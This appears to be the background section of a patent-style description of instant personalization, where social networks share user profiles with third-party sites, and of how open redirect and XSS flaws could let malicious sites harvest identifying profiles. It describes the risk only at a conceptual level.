Instant personalization is a feature that allows a user's experience to be personalized the moment that user visits a third party app or website by bringing the user's profile with the user. The user's profile may include the user's name, profile picture, gender, networks, friend list, and other information the user has made available. The third party website can present the user a personalized webpage and/or application based on the user's profile.
For example, when a specific user visits a movie review site while logged into a social networking site, the social networking site may share the specific user's profile with the movie review site unnoticeably in the background. Based on the specific user's profile, the movie review site can provide the specific user a personalized experience, such as a greeting with the specific user's name, letting the specific user see movies that friends of the specific user have rated or reviewed, and giving movie recommendations based on movies that the specific user has previously “liked.”
However, security abuses (e.g., open redirects and XSS attacks) have become a concern for platforms facilitating instant personalization. A particular class of abuses involves platforms providing third-party applications with users' fully identifying profiles. Here, fully identifying profiles refer to profile information that unambiguously identifies specific individuals. Profiles that include a user's full name along with gender and networks often unambiguously identify individuals. Similarly, profiles that include IDs that may be used to lookup a user's full name, gender, and networks can in turn be used to unambiguously identify individuals.
Malicious apps and websites can redirect visitors to third-party software (e.g., applications and websites/webpages) that integrate with instant personalization platforms that provide fully identifying profiles. These redirects can happen in background browser windows or quickly without visitor knowledge. Upon redirect, these platforms will provide the third-party software (e.g., applications, websites) with fully identifying profiles for the visitors. The malicious app or website can then exploit any open redirect or XSS vulnerability in the third-party applications and websites to retrieve the visitors' fully identifying profiles. This in turn can be used to blackmail users who visit compromising malicious apps and websites. In general, platforms facilitating instant personalization through fully identifying profiles are subject to a range of such attacks.